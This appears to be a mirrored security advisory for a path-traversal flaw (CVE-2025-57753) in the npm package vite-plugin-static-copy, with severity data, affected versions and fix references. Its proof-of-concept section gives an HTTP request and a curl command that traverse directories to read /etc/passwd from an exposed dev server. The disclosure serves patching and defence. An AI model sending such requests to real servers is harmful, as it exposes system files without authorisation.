GHSA-pp7p-q8fx-2968
Suggest an improvement- Source
- https://github.com/advisories/GHSA-pp7p-q8fx-2968
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-pp7p-q8fx-2968/GHSA-pp7p-q8fx-2968.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-pp7p-q8fx-2968
- Aliases
- Published
- 2025-08-21T14:53:52Z
- Modified
- 2025-08-21T19:16:58Z
- Severity
-
- 6.0 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- vite-plugin-static-copy files not included in `src` are possible to access with a crafted request
- Details
-
Summary
Files not included in
srcwas possible to access with a crafted request.Impact
Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
Arbitrary files can be disclosed by exploiting this vulnerability.
Details
Consider the following configuration in used by
vite.config.ts:import { defineConfig } from 'vite' import { viteStaticCopy } from 'vite-plugin-static-copy' export default defineConfig({ plugins: [ viteStaticCopy({ targets: [ { src: "./public/images", dest: "./", }, ], }), ], });The files under the
./public/imagesis only expected to be served. Abusing this vulnerability, an attacker can access arbitrary files on the filesystem.PoC
I've attached a demo app to showcase the bug.
Run it with
npm run devand issue the following HTTP requestGET /static/images/../../../../../../../etc/passwd HTTP/1.1 Host: localhost:3001 Content-Length: 2OR
curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: localhost:3001' -H $'Content-Length: 2' \ --data-binary $'\x0d\x0a' \ $'http://localhost:3001/static/images/../../../../../../../etc/passwd'Observe that the
/etc/passwdfile is included in the response.<img width="1289" height="449" alt="Screenshot 2025-08-16 at 10 27 11 PM" src="https://github.com/user-attachments/assets/4de12612-7b86-44d7-a403-c76f12832e37" />
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2025-08-21T14:53:52Z", "nvd_published_at": "2025-08-21T16:15:34Z", "severity": "MODERATE", "cwe_ids": [ "CWE-22" ] }- References
-
- https://github.com/sapphi-red/vite-plugin-static-copy/security/advisories/GHSA-pp7p-q8fx-2968
- https://nvd.nist.gov/vuln/detail/CVE-2025-57753
- https://github.com/sapphi-red/vite-plugin-static-copy/commit/0bc6b49ed72b46eecfc9682045f4b46a19694969
- https://github.com/sapphi-red/vite-plugin-static-copy/commit/4627afb8582083eab733881d3d974e1c1f23997d
- https://github.com/sapphi-red/vite-plugin-static-copy
- https://github.com/sapphi-red/vite-plugin-static-copy/releases/tag/vite-plugin-static-copy%402.3.2
- https://github.com/sapphi-red/vite-plugin-static-copy/releases/tag/vite-plugin-static-copy%403.1.2
Affected packages
npm / vite-plugin-static-copy
Package
- Name
- vite-plugin-static-copy
- View open source insights on deps.dev
- Purl
- pkg:npm/vite-plugin-static-copy
npm / vite-plugin-static-copy
Package
- Name
- vite-plugin-static-copy
- View open source insights on deps.dev
- Purl
- pkg:npm/vite-plugin-static-copy